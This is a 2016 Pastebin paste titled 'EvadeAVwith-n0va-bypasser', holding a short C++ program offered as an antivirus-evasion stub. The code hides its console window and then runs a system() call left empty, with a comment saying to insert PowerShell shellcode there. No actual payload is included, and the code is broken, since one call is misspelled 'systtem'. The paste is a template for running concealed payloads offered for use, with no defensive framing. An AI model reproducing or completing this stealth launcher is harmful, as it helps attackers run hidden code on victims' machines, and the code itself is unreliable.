n0va_sa

EvadeAVwith-n0va-bypasser

Dec 26th, 2016
344
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 0.46 KB | None | 0 0
  1. /*
  2. You can Compile Online this Code
  3. http://www.onlinecompiler.net/ <===== HERE
  4. Created By n0va
  5. */
  6. #include <iostream>
  7. #include <windows.h>
  8. int shellCode(){
  9.     systtem("color 63");
  10.     system("");// put the powershell here.
  11.     /*
  12.         ((Shell Code into the console))
  13.     */
  14.     return 0;
  15. }
  16. void hide(){
  17.     HWND stealth;
  18.     AllocConsole();
  19.     stealth = FindWindowA("ConsoleWindowClass",NULL);
  20.     ShowWindow (stealth,0);
  21. }
  22. int main(){
  23.     hide();
  24.     shellCode();
  25.     return 0;
  26. }
Add Comment
Please, Sign In to add comment